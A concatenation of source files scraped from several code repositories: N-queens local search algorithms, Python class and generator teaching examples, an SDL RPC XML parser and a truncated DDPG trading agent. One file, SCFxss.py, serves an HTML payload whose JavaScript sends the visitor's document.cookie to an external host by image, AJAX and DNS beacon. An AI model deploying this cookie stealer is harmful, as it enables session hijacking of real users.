else: continue break return mutation_population #------------------------------------------------------------------# #--------------------公有化的算法层函数-----------------------------# # @breif:贪婪爬山算法 # @attention:每次选取全局邻域内最优的点拓展 # @param[in]:None # @retval:None def hill_climbing(self): best_row_list = self.row_axis.copy() for i in range(self.queens): temp_row_list = self.row_axis.copy() for j in range(self.queens): temp_row_list[i] = self.col_axis[j] temp_h_value = self.__h_x(temp_row_list,self.col_axis) if(temp_h_value<self.h_value): self.h_value = temp_h_value best_row_list = temp_row_list.copy() self.row_axis = best_row_list # @breif:首选爬山算法 # @attetion:随机探索邻域,若探索点优于当前则拓展,直至最优 # @param[in]:None # @retval:None def first_hill_climbing(self): best_row_list = self.row_axis.copy() self.row_axis,self.h_value = self.__random_explor_opt(best_row_list,self.col_axis) # @breif:随机重启爬山算法 # @attetion:当贪婪爬山算法陷入局部最优时,立即随机重启 # @param[in]:None # @retval:None def random_rehill_climbing(self): self.loc_opt_flag = 1 best_row_list = self.row_axis.copy() for i in range(self.queens): temp_row_list = self.row_axis.copy() for j in range(self.queens): temp_row_list[i] = self.col_axis[j] temp_h_value = self.__h_x(temp_row_list,self.col_axis) if(temp_h_value<self.h_value): self.h_value = temp_h_value best_row_list = temp_row_list.copy() self.loc_opt_flag = 0 #只要有一点改进就不处于局部最优 if((self.loc_opt_flag==1)&(self.h_value>0)): #随机重启 self.row_axis = [random.randint(1,self.queens) for _ in range(self.queens)] self.h_value = self.__h_x(self.row_axis,self.col_axis) else: self.row_axis = best_row_list # @breif:局部束算法 # @param[in]:last_K_dic->前一次K个状态组成的字典 # @retval:new_K_dic->新一次K个状态组成的字典 def local_beam(self,last_K_dic): new_K_dic = {} for key in last_K_dic: temp_dic = self.__random_explor_k(list(key),self.col_axis,self.K) new_K_dic = self.__dic_sum(new_K_dic,temp_dic) new_K_dic = dict(sorted(new_K_dic.items(),key=lambda kv: kv[1])) new_K_dic = self.__dic_cut(new_K_dic,0,self.K) self.row_axis = list(list(new_K_dic.keys())[0]) self.h_value = list(new_K_dic.values())[0] return new_K_dic # @breif:随机束算法 # @param[in]:last_K_dic->前一次K个状态组成的字典 # @retval:new_K_dic->新一次K个状态组成的字典 def random_beam(self,last_K_dic): temp_K_dic,new_K_dic = {},{} for key in last_K_dic: temp_dic = self.__random_explor_k(list(key),self.col_axis,self.K) temp_K_dic = self.__dic_sum(temp_K_dic,temp_dic) while(1): random_index = random.randint(0,len(temp_K_dic)-1) temp_flag = self.__random_beam_trans(list(temp_K_dic.values())[random_index]) if(temp_flag): new_K_dic[list(temp_K_dic.keys())[random_index]] = list(temp_K_dic.values())[random_index] else: continue if(len(new_K_dic)==self.K): break new_K_dic = dict(sorted(new_K_dic.items(),key=lambda kv: kv[1])) self.row_axis = list(list(new_K_dic.keys())[0]) self.h_value = list(new_K_dic.values())[0] return new_K_dic # @breif:模拟退火算法 # @attetion:以一定概率接受劣于当前节点的值,以求避免陷入局部最优 # @param[in]:None # @retval:None def simu_anneal(self): temp_row_list = self.row_axis.copy() i = random.randint(0,self.queens-1) temp_row_list[i] = random.randint(1,self.queens) temp_h_value = self.__h_x(temp_row_list,self.col_axis) flag = self.__simu_anneal_trans(self.T_n,self.h_value,temp_h_value) self.T_n = self.T_n*self.T_lamda if(flag): self.row_axis = temp_row_list self.h_value = temp_h_value else: return # @breif:遗传算法 # @param[in]:last_G_dic->前一代种群组成的字典 # @retval:new_G_dic->新一代种群组成的字典 def genetic_algorithm(self,last_G_dic): selected_population = self.__ga_selection(last_G_dic) crossover_population = self.__ga_crossover(selected_population) new_G_dic = self.__ga_mutation(crossover_population) new_G_dic = dict(sorted(new_G_dic.items(),key=lambda kv: kv[1])) self.row_axis = list(list(new_G_dic.keys())[0]) self.h_value = list(new_G_dic.values())[0] return new_G_dic #------------------------------------------------------------------# #----------------------------------------------------------------------------------------------------------# ```
{ "source": "914525753/XssToHost", "score": 2 }
#### File: 914525753/XssToHost/SCFxss.py ```python def main_handler(event, context): html = '<html><head><meta http-equiv="Access-Control-Allow-Origin" content="*"><script src=https://libs.baidu.com/jquery/2.1.4/jquery.min.js></script>' html += '<script async="async">function XssImg(){var src="http://EXAMPLE.COM/?cookie="+document.cookie;$("html").append("<div id=xss></div>");$("#xss").css("display","none");$("#xss").append("<Img/Src="+src+" />")}XssImg();$.ajax({type:"GET",dataType:"html",url:"http://EXAMPLE.COM",data:"cookie="+document.cookie,});</script></head>' html += '<img id="shadow" style="display:none;"></img><style/onload=\'function xss(){var cookie=(document.cookie)?document.cookie:"nocookie";var src="http://"+cookie+".EXAMPLE.COM/1.jpg"document.getElementById("shadow").setAttribute("src",src)}xss();\'></style>' html += "</html>" response={ "isBase64Encoded": False, "statusCode": 200, "headers": {'Content-Type': 'text/html;charset=utf8'}, "body": html } return response ```
{ "source": "91472/Class-in-Python.-Encapsulation.-Inheritance.-Polymorphism", "score": 3 }
#### File: 91472/Class-in-Python.-Encapsulation.-Inheritance.-Polymorphism/Ultra_lite_parental_class.py ```python class Formulas_2D: # создание класса Formulas_2D ''' Домументрирование класса. Класс Formulas_2D выводит по одному примеру из основных формул плоской геометрической фигуры, объект класса - это фигура. Для создания объекта класса Formulas_2D и вывода формул его периметра и площади необходимо указать один аргумент: тип фигуры и применить к объекту метод вывода формул: .formulas() Тип фигуры (аргумент type_figure) может быть один из: quadrat (квадрат), rectangle (прямоугольник), parallelogram (параллелограмм), rhombus (ромб), trapezoid (трапеция), triangle (треугольник), circle (окружность). ''' def __init__(self, type_figure): # встроенный метод класса, инициализация self.figure = type_figure # аргумент, тип фигуры if self.figure not in ['circle', 'quadrat', 'rectangle', 'parallelogram', 'triangle', 'trapezoid', 'rhombus']: raise Exception ('Ошибка ввода аргументов') # если уловие True, то принудительно запустить исключение def __str__(self): # встроенный метод класса, что выводить на экран когда для вывода подается сам объект return f'Фигура {self.figure}' def formulas(self): #метод класса, вывод формул площади и периметра фигуры dict_formul = {'quadrat': 'P = 4 * a, S = a * a, где a - длина стороны, P - периметр, S - площадь', 'rectangle': 'P = 2*(a+b), S = a * b, где a,b - длины сторон, P - периметр, S - площадь', 'parallelogram': 'P = 2*(a+b), S = a(b) * h, где a,b - длины сторон, h - длина высоты опущенной на эту сторону, P - периметр, S - площадь', 'rhombus': 'P = 4 * a, S = a * h, где a - длина стороны, h - длина высоты опущенной на эту сторону, P - периметр, S - площадь', 'trapezoid': 'P = a+b+с+d, S = h*(a+b)/2, где a,b - длины оснований, h - длина высоты, P - периметр, S - площадь', 'triangle': 'P = a+b+с, S = (a * h)/2, где a - длина стороны, h - длина высоты опущенной на эту сторону, P - периметр, S - площадь', 'circle': 'P = 2*pi*R, S = pi * R^2, где R - радиус окружности, P - длина окружности, S - площадь'} return dict_formul[self.figure] # проверка откуда запускается наш код, если True, то как отдельный скрипт и выполняется все, что ниже, если False, то # импоритируется из файла .py как отдельный модуль, полностью или частично по обращению к его методам if __name__ == '__main__': try: # далее код программы, который может вызвать исключение: # help(Formulas_2D) # вызов справки по созданному классу с его документацией figure = Formulas_2D('triangle') # определеяем объект класса #figure.figure = 'quadrat' # после применения инкапсуляции доступ к эти аргументам извне будет недоступен #figure._Formulas_2D__figure = 'quadrat' #если не применить инкапсуляцию к этим аргументам, то их можно изменить после определения объекта print(figure, figure.formulas()) #и тогда результат будет неверным, относительно исхоных входных параметров при определении объекта except: # если поймано исключение, то выдать следующее сообщение: print('Ошибка ввода аргумента, несоответсвующий тип фигуры, см help(Formulas_2D)') class Prime_numbers: # создание класса Prime_numbers ''' Домументрирование класса. Класс Prime_numbers проверяет является ли введеное число простым, объект класса - это число. Для создания объекта класса Prime_numbers необходимо указать один аргумент: натуральное (целое положительное) число. Справка: Простое число — натуральное (целое положительное) число, имеющее ровно два различных натуральных делителя — единицу и самого себя. Другими словами, число x является простым, если оно больше 1 и при этом делится без остатка только на 1 и на x. ''' def __init__(self, n): # встроенный метод класса, инициализация self.__number = n if type(self.__number) != int or self.__number < 2: raise Exception ('Ошибка, введеное число не натуральное') # если уловие True, то принудительно запустить исключение def __str__(self): # встроенный метод класса, что выводить на экран когда для вывода подается сам объект return f'Натуральное число {self.__number}' def prime_number(self): #создаем функцию(метод класса) с именем prime_number if self.__number == 2 or self.__number == 3: #если число равно 2 или 3, то оно простое, тогда функция возвращает True return True #возврат значения True else: for i in range(2, int(self.__number/2)+1): #проверяем существует ли для данного числа целочисленный делитель от 2 до int(number/2), если делитель встретился, то сразу возврат значения False if self.__number % i == 0: return False return True #если целочисленный делитель не обнаружен, то возвращается значение True (число простое) if __name__ == '__main__': try: # далее код программы, который может вызвать исключение: #help(Prime_numbers) # вызов справки по созданному классу с его документацией num = Prime_numbers(10) # определеяем объект класса num.__number = 11 # после применения инкапсуляции доступ к эти аргументам извне будет недоступен # num.number = 11 #если не применить инкапсуляцию к этим аргументам, то их можно изменить после определения объекта print('\n', num, ' является простым? - ', num.prime_number(), sep = '') #и тогда результат будет неверным, относительно исхоных входных параметров при определении объекта except: # если поймано исключение, то выдать следующее сообщение: print('\nОшибка, введеное число не натуральное или меньше 2, см help(Prime_numbers)') ```
{ "source": "91472/Lesson-8.-Generators-ternary-operator-decorator.", "score": 3 }
#### File: 91472/Lesson-8.-Generators-ternary-operator-decorator./Pro.py ```python import os #библиотека для работы с ОС import psutil #библиотека для работы с процессами (информация о запущенных процессах, использование системы) def rss(f): #создем функцию-декоратор для замера объема памяти RAM потребляемой декорируемой функцией def wrapper(*args, **kwargs): # методом Process модуля psutil создаем объект, содержащий стат.информацию о текущем процессе #PID-идентификатор текущего процесса берем методом getpid обращаясь к модулю os: os.getpid() proc = psutil.Process(os.getpid()) #применяем метод memory_info() к нашему объекту proc для извлечения информации о заполнении оперативной памяти # на текущий момент, из всего кортежа os.getpid() берем только rss (RAM) в байтах, делим на 1000000 для Мб: rss_before = proc.memory_info().rss/1000000 fun = f(*args, **kwargs) #присвоение декорируемой функции proc = psutil.Process(os.getpid()) rss_after = proc.memory_info().rss/1000000 #объем задействованной RAM после вызова и исполнения функции f rss = round((rss_after - rss_before), 3) return rss return wrapper #функция-декоратор возвращает объем потребляемой памяти в Мб #3.4. Сравнить объем оперативной памяти для функции создания генератора и #функции создания списка с элементами: натуральные числа от 1 до 1000000. #Создадим функцию-генератор и функцию-генератор последовательности для натуральных чисел от 1 до 1000000 #функция-генератор: def gen(num): for i in range(1, num + 1): yield i #функция-генератор списка: def gen_list(num): return list(i for i in range(1, num+1)) #применим к созданным функциям выше созданный декоратор: @rss def gen(num): for i in range(1, num+1): yield i @rss def gen_list(num): return list(i for i in range(1, num+1)) print('Объем оперативной памяти потребляемый генератором, Мб:', gen(1000000)) #вызов функции с декоратором print('Объем оперативной памяти потребляемый функцией-генератором списка, Мб:', gen_list(1000000)) #вызов функции с декоратором ```
{ "source": "914802951/sdl_core_v4.0_winceport", "score": 3 }
#### File: generator/parsers/RPCBase.py ```python import collections import xml.etree.ElementTree from generator import Model class ParseError(Exception): """Parse error. This exception is raised when XML contains errors and can't be parsed. """ pass class Parser(object): """RPC XML Parser base. This class must not be used directly. One of its subclasses must be used instead. """ def __init__(self): """Constructor.""" self._types = {} self._enums = collections.OrderedDict() self._structs = collections.OrderedDict() self._functions = collections.OrderedDict() self._params = {} def parse(self, filename): """Parse XML. Returns an instance of generator.Model.Interface containing parsed interface or raises ParseError if input XML contains errors and can't be parsed. Keyword arguments: filename -- name of input XML file. """ tree = xml.etree.ElementTree.parse(filename) root = tree.getroot() self._enums = self._initialize_enums() self._structs = collections.OrderedDict() self._functions = collections.OrderedDict() self._params = {} self._types = dict(self._enums.items()) self._parse_root(root) return Model.Interface(enums=self._enums, structs=self._structs, functions=self._functions, params=self._params) def _initialize_enums(self): """Initialize enums. The default implementation returns an OrderedDict with two empty enums: "FunctionID" and "messageType". Required for formats where these enums must be generated automatically according to the declared in the XML functions. These enums are filled during the parsing of the functions. """ return collections.OrderedDict( [("FunctionID", Model.Enum(name="FunctionID")), ("messageType", Model.Enum(name="messageType"))]) def _check_enum_name(self, enum): """Check enum name. This method is called to check whether the newly parsed enum's name conflicts with some predefined enum. This implementation raises an error if enum name is one of the predefined enums "FunctionID" or "messageType" which must not be declared explicitly in the XML. """ if enum.name in ["FunctionID", "messageType"]: raise ParseError( "Enum '" + enum.name + "' is generated automatically in SDLRPCV1 and" " must not be declared in xml file") def _check_function_param_name(self, function_param_name): """Check function param name. This method is called to check whether the newly parsed function parameter name conflicts with some predefined name. This implementation doesn't check anything because there is no predefined names in base RPC XML. """ pass def _parse_root(self, root): """Parse root XML element. Default implementation parses root as interface element without a prefix. Keyword arguments: root -- root element. """ self._parse_interface(root, "") def _parse_interface(self, interface, prefix): """Parse interface element. Keyword arguments: interface -- interface element. prefix -- string prefix for all types of the interface. """ if interface.tag != "interface": raise ParseError("Invalid interface tag: " + interface.tag) params, subelements, attrib = self._parse_base_item(interface, "") for param in ["description", "design_description", "todos"]: if 0 != len(params[param]): attrib[param] = "\n".join(params[param]) if 0 != len(params["issues"]): attrib["issues"] = "\n".join(i.value for i in params["issues"]) self._params = dict( self._params.items() + [(prefix + p[0], p[1]) for p in attrib.items()]) for element in subelements: if element.tag == "enum": enum = self._parse_enum(element, prefix) self._check_enum_name(enum) self._add_item(self._enums, enum) self._add_type(enum) elif element.tag == "struct": struct = self._parse_struct(element, prefix) self._add_item(self._structs, struct) self._add_type(struct) elif element.tag == "function": function = self._parse_function(element, prefix) self._add_item(self._functions, function, (function.function_id, function.message_type)) else: raise ParseError("Unexpected element: " + element.tag) @staticmethod def _add_item(items, item, key=None): """Add new item in the items dictionary with given key. Performs additional check for presence in the dictionary and throws ParseError exception if key already exist. """ if key is None: key = item.name if key in items: raise ParseError(type(item).__name__ + " '" + str(key) + "' is declared more than once") items[key] = item def _add_type(self, _type): """Add new type in the internal types dictionary. Performs additional check for presence type with same name in the dictionary and throws ParseError exception if key already exist. """ if _type.name in self._types: raise ParseError("Type '" + _type.name + "' is declared as both struct and enum") self._types[_type.name] = _type def _parse_enum(self, element, prefix): """Parse element as enumeration. Returns an instance of generator.Model.Enum """ params, subelements, attributes = \ self._parse_base_item(element, prefix) internal_scope = None scope = None for attribute in attributes: if attribute == "internal_scope": internal_scope = attributes[attribute] elif attribute == "scope": scope = attributes[attribute] else: raise ParseError("Unexpected attribute '" + attribute + "' in enum '" + params["name"] + "'") params["internal_scope"] = internal_scope params["scope"] = scope elements = collections.OrderedDict() for subelement in subelements: if subelement.tag == "element": self._add_item(elements, self._parse_enum_element(subelement)) else: raise ParseError("Unexpected element '" + subelement.tag + "' in enum '" + params["name"] + "'") params["elements"] = elements # Magic usage is correct # pylint: disable=W0142 return Model.Enum(**params) def _parse_struct(self, element, prefix): """Parse element as structure. Returns an instance of generator.Model.Struct """ params, subelements, attrib = self._parse_base_item(element, prefix) scope = None for attribute in attrib: if attribute == "scope": scope = attrib[attribute] else: raise ParseError("Unexpected attribute '" + attribute + "' in struct '" + params["name"] + "'") params["scope"] = scope members = collections.OrderedDict() for subelement in subelements: if subelement.tag == "param": self._add_item(members, self._parse_param(subelement, prefix)) else: raise ParseError("Unexpected subelement '" + subelement.name + "' in struct '" + params["name"] + "'") params["members"] = members # Magic usage is correct # pylint: disable=W0142 return Model.Struct(**params) def _parse_function(self, element, prefix): """Parse element as function. Returns an instance of generator.Model.Function """ params, subelements, attributes = \ self._parse_base_item(element, prefix) function_id, message_type = self._parse_function_id_type( params["name"], attributes) scope = None for attribute in attributes: if attribute == "scope": scope = attributes[attribute] params["function_id"] = function_id params["message_type"] = message_type params["scope"] = scope function_params = collections.OrderedDict() for subelement in subelements: if subelement.tag == "param": function_param = self._parse_function_param(subelement, prefix) self._check_function_param_name(function_param.name) if function_param.name in function_params: raise ParseError("Parameter '" + function_param.name + "' is specified more than once" + " for function '" + params["name"] + "'") function_params[function_param.name] = function_param else: raise ParseError("Unexpected subelement '" + subelement.tag + "' in function '" + params["name"] + "'") params["params"] = function_params # Magic usage is correct # pylint: disable=W0142 return Model.Function(**params) def _parse_function_id_type(self, function_name, attrib): """Parse function id and message type according to XML format. This implementation takes function name as function id and extracts attribute "messagetype" as message type and searches them in enums "FunctionID" and "messageType" adding the missing elements if necessary. Returns function id and message type as an instances of EnumElement. """ if "messagetype" not in attrib: raise ParseError("No messagetype specified for function '" + function_name + "'") function_id = self._provide_enum_element_for_function( "FunctionID", function_name) message_type = self._provide_enum_element_for_function( "messageType", self._extract_attrib(attrib, "messagetype")) return function_id, message_type def _provide_enum_element_for_function(self, enum_name, element_name): """Provide enum element for functions. Search an element in an enum and add it if it is missing. Returns EnumElement. """ if enum_name not in self._types: raise ParseError("Enum '" + enum_name + "' is not initialized") enum = self._types[enum_name] if not isinstance(enum, Model.Enum): raise ParseError("'" + enum_name + "' is not an enum") if element_name not in enum.elements: enum.elements[element_name] = Model.EnumElement(name=element_name) return enum.elements[element_name] def _parse_base_item(self, element, prefix): """Parse element as base item. Returns an params, sub-elements and attributes of the element """ params = {} description = [] design_description = [] issues = [] todos = [] subelements = [] if "name" not in element.attrib: raise ParseError("Name is not specified for " + element.tag) params["name"] = prefix + element.attrib["name"] attrib = dict(element.attrib.items()) del attrib["name"] params["platform"] = self._extract_attrib(attrib, "platform") for subelement in element: if subelement.tag == "description": description.append(self._parse_simple_element(subelement)) elif subelement.tag == "designdescription": design_description.append( self._parse_simple_element(subelement)) elif subelement.tag == "todo": todos.append(self._parse_simple_element(subelement)) elif subelement.tag == "issue": issues.append(self._parse_issue(subelement)) else: subelements.append(subelement) params["description"] = description params["design_description"] = design_description params["issues"] = issues params["todos"] = todos return params, subelements, attrib @staticmethod def _parse_simple_element(element): """Parse element as simple element and returns it's text. Element is simple when it contains no subelements and attributes. Returns element text if present or empty string if not """ if len(element) != 0: raise ParseError("Unexpected subelements in '" + element.tag + "'") if len(element.attrib) != 0: raise ParseError("Unexpected attributes in '" + element.tag + "'") return element.text if element.text is not None else "" @staticmethod def _parse_issue(element): """Parse element as issue. Issue must not contain subelements and attributes. Returns an instance of generator.Model.Issue """ if len(element) != 0: raise ParseError("Unexpected subelements in issue") if "creator" not in element.attrib: raise ParseError("No creator in issue") if len(element.attrib) != 1: raise ParseError("Unexpected attributes in issue") return Model.Issue( creator=element.attrib["creator"], value=element.text if element.text is not None else "") def _parse_enum_element(self, element): """Parse element as element of enumeration. Returns an instance of generator.Model.EnumElement """ params, subelements, attributes = self._parse_base_item(element, "") if len(subelements) != 0: raise ParseError("Unexpected subelements in enum element") self._ignore_attribute(attributes, "hexvalue") self._ignore_attribute(attributes, "scope") self._ignore_attribute(attributes, "rootscreen") internal_name = None value = None for attribute in attributes: if attribute == "internal_name": internal_name = attributes[attribute] elif attribute == "value": try: value = int(attributes[attribute]) except: raise ParseError("Invalid value for enum element: '" + attributes[attribute] + "'") params["internal_name"] = internal_name params["value"] = value # Magic usage is correct # pylint: disable=W0142 return Model.EnumElement(**params) def _parse_param(self, element, prefix): """Parse element as structure parameter. Returns an instance of generator.Model.Param """ params, subelements, attrib = \ self._parse_param_base_item(element, prefix) if len(attrib) != 0: raise ParseError("""Unknown attribute(s) {0} in param {1} """.format(attrib, params["name"])) if len(subelements) != 0: raise ParseError("Unknown subelements in param '" + params["name"] + "'") # Magic usage is correct # pylint: disable=W0142 return Model.Param(**params) def _parse_function_param(self, element, prefix): """Parse element as function parameter. Returns an instance of generator.Model.FunctionParam """ params, subelements, attrib = \ self._parse_param_base_item(element, prefix) default_value = None default_value_string = self._extract_attrib(attrib, "defvalue") if default_value_string is not None: param_type = params["param_type"] if type(param_type) is Model.Boolean: default_value = \ self._get_bool_from_string(default_value_string) elif type(param_type) is Model.Integer: try: default_value = int(default_value_string) except: raise ParseError("Invalid value for integer: '" + default_value_string + "'") elif type(param_type) is Model.Double: try: default_value = float(default_value_string) except: raise ParseError("Invalid value for float: '" + default_value_string + "'") elif type(param_type) is Model.String: default_value = default_value_string elif type(param_type) is Model.Enum or \ type(param_type) is Model.EnumSubset: if type(param_type) is Model.EnumSubset: allowed_elements = param_type.allowed_elements else: allowed_elements = param_type.elements if default_value_string not in allowed_elements: raise ParseError("Default value '" + default_value_string + "' for parameter '" + params["name"] + "' is not a member of " + type(param_type).__name__ + "'" + params["name"] + "'") default_value = allowed_elements[default_value_string] else: raise ParseError("Default value specified for " + type(param_type).__name__) params["default_value"] = default_value if len(attrib) != 0: raise ParseError("Unexpected attributes in parameter '" + params["name"] + "'") if len(subelements) != 0: raise ParseError("Unexpected subelements in parameter '" + params["name"] + "'") # Magic usage is correct # pylint: disable=W0142 return Model.FunctionParam(**params) def _parse_param_base_item(self, element, prefix): """Parse base param items. Returns params, other subelements and attributes. """ params, subelements, attrib = self._parse_base_item(element, "") params["is_mandatory"] = self._extract_optional_bool_attrib( attrib, "mandatory", True) scope = self._extract_attrib(attrib, "scope") if scope is not None: params["scope"] = scope default_value = None; param_type = None type_name = self._extract_attrib(attrib, "type") if type_name is None: raise ParseError("Type is not specified for parameter '" + params["name"] + "'") if type_name == "Boolean": default_value = self._extract_attrib( attrib, "defvalue") if default_value != None: default_value = self._get_bool_from_string(default_value); param_type = Model.Boolean(default_value=default_value) elif type_name == "Integer" or \ type_name == "Float" or \ type_name == "Double" : min_value = self._extract_optional_number_attrib( attrib, "minvalue", int if type_name == "Integer" else float) max_value = self._extract_optional_number_attrib( attrib, "maxvalue", int if type_name == "Integer" else float) default_value = self._extract_optional_number_attrib( attrib, "defvalue", int if type_name == "Integer" else float) param_type = \ (Model.Integer if type_name == "Integer" else Model.Double)( min_value=min_value, max_value=max_value, default_value=default_value) elif type_name == "String": min_length = self._extract_optional_number_attrib( attrib, "minlength") # if minlength is not defined default value is 1 if min_length is None: min_length = 1 max_length = self._extract_optional_number_attrib( attrib, "maxlength") default_value = self._extract_attrib(attrib, "defvalue") param_type = Model.String(min_length=min_length, max_length=max_length, default_value=default_value) else: if 1 == type_name.count("."): custom_type_name = type_name.replace(".", "_") else: custom_type_name = prefix + type_name if custom_type_name in self._types: param_type = self._types[custom_type_name] default_value = self._extract_attrib(attrib, "defvalue") if default_value != None: if default_value not in param_type.elements: raise ParseError("Default value '" + default_value + "' for parameter '" + params["name"] + "' is not a member of " + type(param_type).__name__ + "'" + params["name"] + "'") default_value = param_type.elements[default_value] else: raise ParseError("Unknown type '" + type_name + "'") if self._extract_optional_bool_attrib(attrib, "array", False): min_size = self._extract_optional_number_attrib(attrib, "minsize") max_size = self._extract_optional_number_attrib(attrib, "maxsize") param_type = Model.Array(element_type=param_type, min_size=min_size, max_size=max_size) base_type = \ param_type.element_type if isinstance(param_type, Model.Array) \ else param_type other_subelements = [] for subelement in subelements: if subelement.tag == "element": if type(base_type) is not Model.Enum and \ type(base_type) is not Model.EnumSubset: raise ParseError("Elements specified for parameter '" + params["name"] + "' of type " + type(base_type).__name__) if type(base_type) is Model.Enum: base_type = Model.EnumSubset( name=params["name"], enum=base_type, description=params["description"], design_description=params["design_description"], issues=params["issues"], todos=params["todos"], allowed_elements={}) if "name" not in subelement.attrib: raise ParseError( "Element name is not specified for parameter '" + params["name"] + "'") element_name = subelement.attrib["name"] if len(subelement.attrib) != 1: raise ParseError("Unexpected attributes for element '" + element_name + "' of parameter '" + params["name"]) if len(subelement.getchildren()) != 0: raise ParseError("Unexpected subelements for element '" + element_name + "' of parameter '" + params["name"]) if element_name in base_type.allowed_elements: raise ParseError("Element '" + element_name + "' is specified more than once for" + " parameter '" + params["name"] + "'") if element_name not in base_type.enum.elements: raise ParseError("Element '" + element_name + "' is not a member of enum '" + base_type.enum.name + "'") base_type.allowed_elements[element_name] = \ base_type.enum.elements[element_name] else: other_subelements.append(subelement) if isinstance(param_type, Model.Array): param_type.element_type = base_type else: param_type = base_type params["param_type"] = param_type if default_value is not None: params["default_value"] = default_value return params, other_subelements, attrib def _extract_optional_bool_attrib(self, attrib, name, default): """Extract boolean attribute with given name. Returns value of the attribute. """ value = self._extract_attrib(attrib, name) if value is None: value = default else: value = self._get_bool_from_string(value) return value def _extract_optional_number_attrib(self, attrib, name, _type=int): """Extract number attribute with given name. Returns value of the attribute. """ value = self._extract_attrib(attrib, name) if value is not None: try: value = _type(value) except: raise ParseError("Invlaid value for " + _type.__name__ + ": '" + value + "'") return value @staticmethod def _extract_attrib(attrib, name): """Extract attribute with given name. Returns value of the attribute. """ value = None if name in attrib: value = attrib[name] del attrib[name] return value @staticmethod def _get_bool_from_string(bool_string): """Convert string representation of boolean to real bool value. Returns converted value. """ value = None if bool_string in ['0', 'false']: value = False elif bool_string in ['1', 'true']: value = True else: raise ParseError("Invalid value for bool: '" + bool_string + "'") return value def _ignore_attribute(self, attrib, name): """To be called when attribute is meaningless in terms of code generation but it's presence is not issue. Removes this attribute from attribute list. """ if name in attrib: del attrib[name] print ("Ignoring attribute '" + name + "'") return True ```
{ "source": "915288938lx/Personae-master-01", "score": 2 }
#### File: algorithm/RL/DDPG.py ```python import tensorflow as tf import numpy as np import os from algorithm import config from base.env.market import Market from checkpoints import CHECKPOINTS_DIR from base.algorithm.model import BaseRLTFModel from helper.args_parser import model_launcher_parser from helper.data_logger import generate_algorithm_logger, generate_market_logger class Algorithm(BaseRLTFModel): def __init__(self, session, env, a_space, s_space, **options): super(Algorithm, self).__init__(session, env, a_space, s_space, **options) self.actor_loss, self.critic_loss = .0, .0 # Initialize buffer. self.buffer = np.zeros((self.buffer_size, self.s_space * 2 + 1 + 1)) self.buffer_length = 0 self._init_input() self._init_nn() self._init_op() self._init_saver() self._init_summary_writer() def _init_input(self): self.s = tf.placeholder(tf.float32, [None, self.s_space], 'state') self.r = tf.placeholder(tf.float32, [None, 1], 'reward') self.s_next = tf.placeholder(tf.float32, [None, self.s_space], 'state_next') def _init_nn(self): # Initialize predict actor and critic. self.a_predict = self.__build_actor_nn(self.s, "predict/actor", trainable=True) self.q_predict = self.__build_critic(self.s, self.a_predict, "predict/critic", trainable=True) # Initialize target actor and critic. self.a_next = self.__build_actor_nn(self.s_next, "target/actor", trainable=False) self.q_next = self.__build_critic(self.s_next, self.a_next, "target/critic", trainable=False) # Save scopes self.scopes = ["predict/actor", "target/actor", "predict/critic", "target/critic"] def _init_op(self): # Get actor and critic parameters. params = [tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope) for scope in self.scopes] zipped_a_params, zipped_c_params = zip(params[0], params[1]), zip(params[2], params[3]) # Initialize update actor and critic op. self.update_a = [tf.assign(t_a, (1 - self.tau) * t_a + self.tau * p_a) for p_a, t_a in zipped_a_params] self.update_c = [tf.assign(t_c, (1 - self.tau) * t_c + self.tau * p_c) for p_c, t_c in zipped_c_params] # Initialize actor loss and train op. with tf.variable_scope('actor_loss'): self.a_loss = -tf.reduce_mean(self.q_predict) with tf.variable_scope('actor_train'): self.a_train_op = tf.train.RMSPropOptimizer(self.learning_rate).minimize(self.a_loss, var_list=params[0]) # Initialize critic loss and train op. self.q_target = self.r + self.gamma * self.q_next with tf.variable_scope('critic_loss'): self.c_loss = tf.losses.mean_squared_error(self.q_target, self.q_predict) with tf.variable_scope('critic_train'): self.c_train_op = tf.train.RMSPropOptimizer(self.learning_rate * 2).minimize(self.c_loss, var_list=params[2]) # Initialize variables. self.session.run(tf.global_variables_initializer()) def run(self): if self.mode != 'train': self.restore() else: for episode in range(self.episodes): self.log_loss(episode) s = self.env.reset(self.mode) while True: c, a, a_index = self.predict(s) s_next, r, status, info = self.env.forward(c, a) self.save_transition(s, a_index, r, s_next) self.train() s = s_next if status == self.env.Done: self.env.trader.log_asset(episode) break if self.enable_saver and episode % 10 == 0: self.save(episode) def train(self): if self.buffer_length < self.buffer_size: return self.session.run([self.update_a, self.update_c]) s, a, r, s_next = self.get_transition_batch() self.critic_loss, _ = self.session.run([self.c_loss, self.c_train_op], {self.s: s, self.a_predict: a, self.r: r, self.s_next: s_next}) self.actor_loss, _ = self.session.run([self.a_loss, self.a_train_op], {self.s: s}) def predict(self, s): a = self.session.run(self.a_predict, {self.s: s})[0][0] return self.get_stock_code_and_action(a, use_greedy=True, use_prob=True if self.mode == 'train' else False) def save_transition(self, s, a, r, s_next): transition = np.hstack((s, [[a]], [[r]], s_next)) self.buffer[self.buffer_length % self.buffer_size, :] = transition self.buffer_length += 1 def get_transition_batch(self): indices = np.random.choice(self.buffer_size, size=self.batch_size) batch = self.buffer[indices, :] s = batch[:, :self.s_space] a = batch[:, self.s_space: self.s_space + 1] r = batch[:, -self.s_space - 1: -self.s_space] s_next = batch[:, -self.s_space:] return s, a, r, s_next def log_loss(self, episode): self.logger.warning("Episode: {0} | Actor Loss: {1:.2f} | Critic Loss: {2:.2f}".format(episode, self.actor_loss, self.critic_loss)) def __build_actor_nn(self, state, scope, trainable=True): w_init, b_init = tf.random_normal_initializer(.0, .001), tf.constant_initializer(.1) with tf.variable_scope(scope): # state is ? * code_count * data_dim. first_dense = tf.layers.dense(state, 64, tf.nn.relu, kernel_initializer=w_init, bias_initializer=b_init, trainable=trainable) action = tf.layers.dense(first_dense, 1, tf.nn.sigmoid, kernel_initializer=w_init, bias_initializer=b_init, trainable=trainable) return tf.multiply(action, self.a_space - 1) @staticmethod def __build_critic(state, action, scope, trainable=True): w_init, b_init = tf.random_normal_initializer(.0, .3), tf.constant_initializer(.1) with tf.variable_scope(scope): s_first_dense = tf.layers.dense(state, 32, tf.nn.relu, kernel_initializer=w_init, bias_initializer=b_init, trainable=trainable) a_first_dense = tf.layers.dense(action, 32, tf.nn.relu, kernel_initializer=w_init, bias_initializer=b_init, trainable=trainable) q_value = tf.layers.dense(tf.nn.relu(s_first_dense + a_first_dense), 1, kernel_initializer=w_init, bias_initializer=b_init, trainable=trainable) return q_value def main(args): mode = args.mode # mode = 'test' codes = args.codes # codes = ["AU88", "RB88", "CU88", "AL88"] # codes = 